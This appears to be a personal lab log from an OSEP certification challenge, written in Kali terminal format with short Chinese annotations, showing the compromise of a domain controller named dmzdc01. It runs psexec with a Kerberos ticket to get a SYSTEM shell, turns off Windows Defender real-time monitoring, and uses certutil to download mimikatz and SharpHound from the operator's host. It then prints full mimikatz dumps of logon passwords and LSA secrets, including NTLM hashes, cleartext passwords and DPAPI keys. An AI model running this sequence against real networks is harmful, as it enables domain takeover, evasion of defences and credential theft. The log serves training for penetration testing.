172.16.64.168是域管服务器
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **export KRB5CCNAME=/home/kali/Documents/osep/Challenge/5/krb5cc_75401103_oJ6stY**
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ **impacket-psexec -k -no-pass -target-ip 172.16.64.168 -dc-ip 172.16.64.168 dmzdc01.complyedge.com**
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.64.168.....
[*] Found writable share ADMIN$
[*] Uploading file YAjgeonw.exe
[*] Opening SVCManager on 172.16.64.168.....
[*] Creating service QeRL on 172.16.64.168.....
[*] Starting service QeRL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> **hostname**
dmzdc01
C:\\Windows\\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.168
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
C:\\Windows\\system32> **type c:\\Users\\Administrator\\Desktop\\proof.txt**
48032d41ce0f31dd5a2b96031dad9936
C:\\Windows\\system32> klist
Current LogonId is 0:0x3e7
Cached Tickets: (11)
#0> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: krbtgt/COMPLYEDGE.COM @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 7/28/2022 21:31:59 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: DMZDC01
#1> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: krbtgt/COMPLYEDGE.COM @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/28/2022 21:31:59 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DMZDC01
#2> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: GC/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:44:27 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#3> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: cifs/DMZDC01 @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:39:15 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#4> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: HTTP/dmzdc01.complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:38:06 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#5> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: LDAP/DMZDC01 @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:37:17 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#6> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: cifs/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:35:21 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#7> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: DMZDC01$ @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:35:21 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#8> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: DNS/dmzdc01.complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:32:12 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#9> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: ldap/dmzdc01.complyedge.com/complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:32:00 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
#10> Client: dmzdc01$ @ COMPLYEDGE.COM
Server: ldap/dmzdc01.complyedge.com @ COMPLYEDGE.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/28/2022 21:31:59 (local)
End Time: 7/29/2022 7:31:59 (local)
Renew Time: 8/4/2022 21:31:59 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DMZDC01
C:\\Windows\\system32> whoami
nt authority\\system
**不需要先进入Powershell终端,那样特别卡,直接用powershell执行命令即可。**
C:\\Windows\\system32> **powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"**
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe**
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.64/SharpHound.exe> SharpHound.exe**
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> **mimikatz.exe "sekurlsa::logonPasswords" "exit"**
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::logonPasswords
Authentication Id : 0 ; 727505 (00000000:000b19d1)
Session : Interactive from 0
User Name : Administrator
Domain : COMPLYEDGE
Logon Server : DMZDC01
Logon Time : 7/28/2022 9:32:00 PM
SID : S-1-5-21-1416213050-106196312-571527550-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : COMPLYEDGE
* NTLM : 289136c329f3e42331048a0465b2290a
* SHA1 : 77ff72368ad479907841e1245b6ac2aa70db4543
* DPAPI : 209a8357be66700074393c5aa052d25f
tspkg :
wdigest :
* Username : Administrator
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
*** Username : Administrator
* Domain : complyedge.com
* Password : fgds90345SDfsw32**
ssp :
credman :
Authentication Id : 0 ; 630261 (00000000:00099df5)
Session : Interactive from 0
User Name : Administrator
Domain : COMPLYEDGE
Logon Server : DMZDC01
Logon Time : 1/13/2022 11:14:48 AM
SID : S-1-5-21-1416213050-106196312-571527550-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : COMPLYEDGE
* NTLM : 289136c329f3e42331048a0465b2290a
* SHA1 : 77ff72368ad479907841e1245b6ac2aa70db4543
* DPAPI : 209a8357be66700074393c5aa052d25f
tspkg :
wdigest :
* Username : Administrator
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : Administrator
* Domain : complyedge.com
* Password : fgds90345SDfsw32
ssp :
credman :
Authentication Id : 0 ; 349675 (00000000:000555eb)
Session : Interactive from 1
User Name : pete
Domain : COMPLYEDGE
Logon Server : DMZDC01
Logon Time : 1/13/2022 11:13:17 AM
SID : S-1-5-21-1416213050-106196312-571527550-1103
msv :
[00000003] Primary
* Username : pete
* Domain : COMPLYEDGE
* NTLM : 61c6e14f88cd70638f901ea51796a194
* SHA1 : 8fa1fe20da989703f76541cac475418cff83ef89
* DPAPI : ebfe2c3d1f5b47286b8e7ccb19c82840
tspkg :
wdigest :
* Username : pete
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : pete
* Domain : COMPLYEDGE.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 69780 (00000000:00011094)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/13/2022 11:12:14 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 0d379f537f53c4fd090b27205861f846
* SHA1 : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : 80 ef f5 b4 30 95 7d 32 5f 80 9f 7e b7 e8 97 74 eb ae 80 1b 55 ba 54 ff 1e 81 3a d7 25 8e ee e2 a4 c4 66 ce a1 b2 df 2f 86 b7 3d cb 0e d5 4c e9 43 69 b4 e8 91 eb 73 9e 93 de ad be de 9f 9b 67 68 bc 5f ed da 46 20 47 b0 d3 3e 5b c1 04 2c 7b 02 a5 6d 88 4d 42 2c 75 b8 28 68 d1 de 8e 1b a1 99 94 3e 6a 3c 47 86 b0 4a 08 ef 87 ff 8f 2a 83 00 08 38 ce 00 04 22 f2 48 d8 9b 7e 56 02 98 86 49 4b a7 81 2d 07 e0 bf 88 52 f2 08 7c c5 b9 c6 31 13 0c da c8 2b 4c b3 2f 69 26 5f 6f 17 37 5e 2b c4 d9 d3 b3 96 47 c5 ad d6 c6 6b b7 37 d7 a2 e5 33 02 00 21 c7 c4 3c c4 97 c4 30 7d c2 39 43 ee 94 5f a0 6f c5 26 00 57 3c 1d 83 2d 98 98 3c 2a 8e 4c e1 b1 c9 3e 2e 25 5c 21 72 18 74 3f d8 5d fc fa 91 d4 b7 b7 3c 87 0f 30 c6 ae 83 79 e9
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DMZDC01$
Domain : COMPLYEDGE
Logon Server : (null)
Logon Time : 1/13/2022 11:12:13 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 0d379f537f53c4fd090b27205861f846
* SHA1 : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : dmzdc01$
* Domain : COMPLYEDGE.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 41705 (00000000:0000a2e9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/13/2022 11:12:13 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 559a540f2a805cd3704acd64ac814a5e
* SHA1 : b4cffe1c159558fe596270d8dca3f8fbe3651421
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : e7 bc 82 8b 66 64 37 87 19 82 79 05 18 54 a9 b1 62 c0 ef e9 48 c6 83 ce f5 43 f9 3c 2b 90 34 60 fc a6 d6 1d 2a b8 d8 0d 38 82 2b 9b 86 f9 60 53 c8 f2 25 c9 04 6c 9e b0 ce e3 73 79 79 c9 d8 d8 b3 54 4f 45 f5 6f fd 2b 79 6d ad 92 5d 6a e0 44 31 2a 4b d0 5d a4 fa 21 fe 44 dd 8a a9 ef e5 be 7a d6 18 7f 75 8e 4c d5 8d c2 3f bc 69 e6 94 d3 30 19 58 7f ea 41 71 d7 53 33 3b 40 fa 01 19 0e 18 ff 68 ee 54 3c c8 b0 e8 05 d1 8c f6 a7 5c b3 9a 13 1d d4 dd fc d8 81 da a5 70 9b 66 d5 c1 a3 08 35 15 7b 3e d6 c8 9a 11 6c 46 23 d1 4f 05 d2 d7 06 16 1a 4e 09 4e 0b cd d0 8d 9c 63 09 8e 8c 67 97 a6 d7 e2 8e 0c ae 63 ac ea 0e a7 2f f9 bb 5e fe 62 66 93 c0 7e 40 a6 f2 32 0c ce cd 10 24 bc 94 11 6b 96 bc 0f 9e 0d 08 45 d0 ba 9c ef dd
ssp :
credman :
Authentication Id : 0 ; 41655 (00000000:0000a2b7)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/13/2022 11:12:13 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 559a540f2a805cd3704acd64ac814a5e
* SHA1 : b4cffe1c159558fe596270d8dca3f8fbe3651421
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : e7 bc 82 8b 66 64 37 87 19 82 79 05 18 54 a9 b1 62 c0 ef e9 48 c6 83 ce f5 43 f9 3c 2b 90 34 60 fc a6 d6 1d 2a b8 d8 0d 38 82 2b 9b 86 f9 60 53 c8 f2 25 c9 04 6c 9e b0 ce e3 73 79 79 c9 d8 d8 b3 54 4f 45 f5 6f fd 2b 79 6d ad 92 5d 6a e0 44 31 2a 4b d0 5d a4 fa 21 fe 44 dd 8a a9 ef e5 be 7a d6 18 7f 75 8e 4c d5 8d c2 3f bc 69 e6 94 d3 30 19 58 7f ea 41 71 d7 53 33 3b 40 fa 01 19 0e 18 ff 68 ee 54 3c c8 b0 e8 05 d1 8c f6 a7 5c b3 9a 13 1d d4 dd fc d8 81 da a5 70 9b 66 d5 c1 a3 08 35 15 7b 3e d6 c8 9a 11 6c 46 23 d1 4f 05 d2 d7 06 16 1a 4e 09 4e 0b cd d0 8d 9c 63 09 8e 8c 67 97 a6 d7 e2 8e 0c ae 63 ac ea 0e a7 2f f9 bb 5e fe 62 66 93 c0 7e 40 a6 f2 32 0c ce cd 10 24 bc 94 11 6b 96 bc 0f 9e 0d 08 45 d0 ba 9c ef dd
ssp :
credman :
Authentication Id : 0 ; 41635 (00000000:0000a2a3)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/13/2022 11:12:13 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 0d379f537f53c4fd090b27205861f846
* SHA1 : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : 80 ef f5 b4 30 95 7d 32 5f 80 9f 7e b7 e8 97 74 eb ae 80 1b 55 ba 54 ff 1e 81 3a d7 25 8e ee e2 a4 c4 66 ce a1 b2 df 2f 86 b7 3d cb 0e d5 4c e9 43 69 b4 e8 91 eb 73 9e 93 de ad be de 9f 9b 67 68 bc 5f ed da 46 20 47 b0 d3 3e 5b c1 04 2c 7b 02 a5 6d 88 4d 42 2c 75 b8 28 68 d1 de 8e 1b a1 99 94 3e 6a 3c 47 86 b0 4a 08 ef 87 ff 8f 2a 83 00 08 38 ce 00 04 22 f2 48 d8 9b 7e 56 02 98 86 49 4b a7 81 2d 07 e0 bf 88 52 f2 08 7c c5 b9 c6 31 13 0c da c8 2b 4c b3 2f 69 26 5f 6f 17 37 5e 2b c4 d9 d3 b3 96 47 c5 ad d6 c6 6b b7 37 d7 a2 e5 33 02 00 21 c7 c4 3c c4 97 c4 30 7d c2 39 43 ee 94 5f a0 6f c5 26 00 57 3c 1d 83 2d 98 98 3c 2a 8e 4c e1 b1 c9 3e 2e 25 5c 21 72 18 74 3f d8 5d fc fa 91 d4 b7 b7 3c 87 0f 30 c6 ae 83 79 e9
ssp :
credman :
Authentication Id : 0 ; 41513 (00000000:0000a229)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 1/13/2022 11:12:13 AM
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 0d379f537f53c4fd090b27205861f846
* SHA1 : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : 80 ef f5 b4 30 95 7d 32 5f 80 9f 7e b7 e8 97 74 eb ae 80 1b 55 ba 54 ff 1e 81 3a d7 25 8e ee e2 a4 c4 66 ce a1 b2 df 2f 86 b7 3d cb 0e d5 4c e9 43 69 b4 e8 91 eb 73 9e 93 de ad be de 9f 9b 67 68 bc 5f ed da 46 20 47 b0 d3 3e 5b c1 04 2c 7b 02 a5 6d 88 4d 42 2c 75 b8 28 68 d1 de 8e 1b a1 99 94 3e 6a 3c 47 86 b0 4a 08 ef 87 ff 8f 2a 83 00 08 38 ce 00 04 22 f2 48 d8 9b 7e 56 02 98 86 49 4b a7 81 2d 07 e0 bf 88 52 f2 08 7c c5 b9 c6 31 13 0c da c8 2b 4c b3 2f 69 26 5f 6f 17 37 5e 2b c4 d9 d3 b3 96 47 c5 ad d6 c6 6b b7 37 d7 a2 e5 33 02 00 21 c7 c4 3c c4 97 c4 30 7d c2 39 43 ee 94 5f a0 6f c5 26 00 57 3c 1d 83 2d 98 98 3c 2a 8e 4c e1 b1 c9 3e 2e 25 5c 21 72 18 74 3f d8 5d fc fa 91 d4 b7 b7 3c 87 0f 30 c6 ae 83 79 e9
ssp :
credman :
Authentication Id : 0 ; 349630 (00000000:000555be)
Session : Interactive from 1
User Name : pete
Domain : COMPLYEDGE
Logon Server : DMZDC01
Logon Time : 1/13/2022 11:13:17 AM
SID : S-1-5-21-1416213050-106196312-571527550-1103
msv :
[00000003] Primary
* Username : **pete**
* Domain : COMPLYEDGE
* NTLM : **61c6e14f88cd70638f901ea51796a194**
* SHA1 : 8fa1fe20da989703f76541cac475418cff83ef89
* DPAPI : ebfe2c3d1f5b47286b8e7ccb19c82840
tspkg :
wdigest :
* Username : pete
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : pete
* Domain : COMPLYEDGE.COM
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 1/13/2022 11:12:14 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 69799 (00000000:000110a7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/13/2022 11:12:14 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 559a540f2a805cd3704acd64ac814a5e
* SHA1 : b4cffe1c159558fe596270d8dca3f8fbe3651421
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : DMZDC01$
* Domain : complyedge.com
* Password : e7 bc 82 8b 66 64 37 87 19 82 79 05 18 54 a9 b1 62 c0 ef e9 48 c6 83 ce f5 43 f9 3c 2b 90 34 60 fc a6 d6 1d 2a b8 d8 0d 38 82 2b 9b 86 f9 60 53 c8 f2 25 c9 04 6c 9e b0 ce e3 73 79 79 c9 d8 d8 b3 54 4f 45 f5 6f fd 2b 79 6d ad 92 5d 6a e0 44 31 2a 4b d0 5d a4 fa 21 fe 44 dd 8a a9 ef e5 be 7a d6 18 7f 75 8e 4c d5 8d c2 3f bc 69 e6 94 d3 30 19 58 7f ea 41 71 d7 53 33 3b 40 fa 01 19 0e 18 ff 68 ee 54 3c c8 b0 e8 05 d1 8c f6 a7 5c b3 9a 13 1d d4 dd fc d8 81 da a5 70 9b 66 d5 c1 a3 08 35 15 7b 3e d6 c8 9a 11 6c 46 23 d1 4f 05 d2 d7 06 16 1a 4e 09 4e 0b cd d0 8d 9c 63 09 8e 8c 67 97 a6 d7 e2 8e 0c ae 63 ac ea 0e a7 2f f9 bb 5e fe 62 66 93 c0 7e 40 a6 f2 32 0c ce cd 10 24 bc 94 11 6b 96 bc 0f 9e 0d 08 45 d0 ba 9c ef dd
ssp :
credman :
Authentication Id : 0 ; 38960 (00000000:00009830)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 1/13/2022 11:12:11 AM
SID :
msv :
[00000003] Primary
* Username : DMZDC01$
* Domain : COMPLYEDGE
* NTLM : 0d379f537f53c4fd090b27205861f846
* SHA1 : 98c10dcf3a39b5cac62496dbce3e6847895b45a4
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DMZDC01$
Domain : COMPLYEDGE
Logon Server : (null)
Logon Time : 1/13/2022 11:12:11 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DMZDC01$
* Domain : COMPLYEDGE
* Password : (null)
kerberos :
* Username : dmzdc01$
* Domain : COMPLYEDGE.COM
* Password : 80 ef f5 b4 30 95 7d 32 5f 80 9f 7e b7 e8 97 74 eb ae 80 1b 55 ba 54 ff 1e 81 3a d7 25 8e ee e2 a4 c4 66 ce a1 b2 df 2f 86 b7 3d cb 0e d5 4c e9 43 69 b4 e8 91 eb 73 9e 93 de ad be de 9f 9b 67 68 bc 5f ed da 46 20 47 b0 d3 3e 5b c1 04 2c 7b 02 a5 6d 88 4d 42 2c 75 b8 28 68 d1 de 8e 1b a1 99 94 3e 6a 3c 47 86 b0 4a 08 ef 87 ff 8f 2a 83 00 08 38 ce 00 04 22 f2 48 d8 9b 7e 56 02 98 86 49 4b a7 81 2d 07 e0 bf 88 52 f2 08 7c c5 b9 c6 31 13 0c da c8 2b 4c b3 2f 69 26 5f 6f 17 37 5e 2b c4 d9 d3 b3 96 47 c5 ad d6 c6 6b b7 37 d7 a2 e5 33 02 00 21 c7 c4 3c c4 97 c4 30 7d c2 39 43 ee 94 5f a0 6f c5 26 00 57 3c 1d 83 2d 98 98 3c 2a 8e 4c e1 b1 c9 3e 2e 25 5c 21 72 18 74 3f d8 5d fc fa 91 d4 b7 b7 3c 87 0f 30 c6 ae 83 79 e9
ssp :
credman :
mimikatz(commandline) # exit
Bye!
mimikatz dump LSA:
c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.64/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\\SYSTEM
512 {0;000003e7} 1 D 34255 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 3785477 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 3828525 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::secrets
Domain : DMZDC01
SysKey : c2da6065f15b53691ad31d2211291f46
Local name : DMZDC01 ( S-1-5-21-2539665111-59215892-2920640915 )
Domain name : COMPLYEDGE ( S-1-5-21-1416213050-106196312-571527550 )
Domain FQDN : complyedge.com
Policy subsystem is : 1.18
LSA Key(s) : 1, default {9b538b73-e7a4-0dda-47aa-da8a1d94503a}
[00] {9b538b73-e7a4-0dda-47aa-da8a1d94503a} a08f64ce8c4eee5777d9f29870cae25d5507a8a6c693ec5b8bcca88710ccb62c
Secret : $MACHINE.ACC
cur/hex : c9 9b c6 be 55 79 fe 0f 4f bb 55 ad f6 fd c0 11 e1 65 60 f6 68 23 10 ac c3 fa 91 f4 06 18 86 67 ba 49 3f 96 e0 24 6b 7f 78 e6 14 f1 cf c7 d1 10 92 45 8e bf 1f 82 75 f2 80 e6 95 60 b2 93 4d 8a b2 6a ac e1 f4 5f e8 79 08 92 11 ed cb a3 ef 9a d4 5a d7 7d b3 d1 bb fe 93 c1 69 e2 d4 61 ac 86 a3 5e fe 16 01 99 4c e4 ee bc 60 05 cf ad 1b eb f5 87 01 60 7b 38 0b 7c 2b 67 f4 9d 10 c8 a7 3e 32 b9 fd 7d 9f c0 f5 9a 96 78 69 ab 72 df 65 b7 41 5e 5b 2b db 1b 80 3b 77 96 21 9b e7 3d 67 ab be 2e 4d 44 e9 e2 cf a3 2c d4 5c 39 ff 14 5b b3 0a 36 07 32 c4 47 aa 2e b2 ae 8c 5d 60 de df 0f 58 b9 e7 f0 61 6d 3b d7 d7 3a 55 e5 40 c0 a6 48 48 6f d6 e9 c7 7c 7a fa 5a 5a d0 ca 14 6b 15 6d af 68 9d 3b e8 61 83 6f 23 ee a1 f8 c7 ef 35 d3
NTLM:0d5228237a9025ef742c9f786985f852
SHA1:cc62f05f1948b99b61a895672b65dcedf9039a2d
old/hex : 99 fd 9f f5 8f 1d 4a 82 95 82 79 55 82 1a ca 43 3e 34 72 82 fc 5a 8e 87 b4 1c 07 2f 44 f9 d8 3c 15 fd 9d f1 d5 69 7a 3f a1 4a 76 33 9e df 95 a6 20 ff 4d c6 e3 aa 45 9b 9b fe 08 fb 00 f6 f3 95 93 b5 70 fb 90 53 01 d1 89 7b 93 8c 78 b1 b5 e3 08 5b 47 30 6b 39 05 64 bc 1d 76 d3 6f 70 68 88 0b c9 8f 7e 39 82 fe d4 16 0d 51 6a ca 5c bd 5e 84 d6 03 ec 7d 21 b2 5b ca e3 3f e6 27 9a 82 4f 53 4c f1 16 c8 30 64 fc 05 34 d4 a6 11 02 77 04 a3 2f a4 f3 18 7b 2b f9 b2 68 e6 e7 da 83 9b 1e 8c a6 82 c0 8c ea 9e fc b8 1f 11 a0 00 04 f6 a9 20 28 ba 70 5d 10 d8 d6 d2 e3 ec fd 37 b3 e1 ee e3 54 9f e3 d6 39 0f d8 22 38 8b 75 e1 51 92 e3 b2 51 bc 6d b2 5d 2b 7a b8 a1 bc a8 6d ed da 0a 1e af d8 63 44 ce 80 8b 90 dd 70 1a 7f b2 47 09
NTLM:05590886ef4c43e36ada28abb67ab386
SHA1:a7626fc177960b0692cb95e744455f6493ea1c8c
**Secret : DefaultPassword
cur/text: sdfsdSE423**
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 57 26 9d 1a f0 c4 a1 3f ca 9b 9d 43 2b 4a 52 1c fc 89 44 36 c3 31 66 4f 25 f5 ea 7d 28 ba 75 a9 3a 3e 05 83 16 82 ec 9c
full: 57269d1af0c4a13fca9b9d432b4a521cfc894436c331664f25f5ea7d28ba75a93a3e05831682ec9c
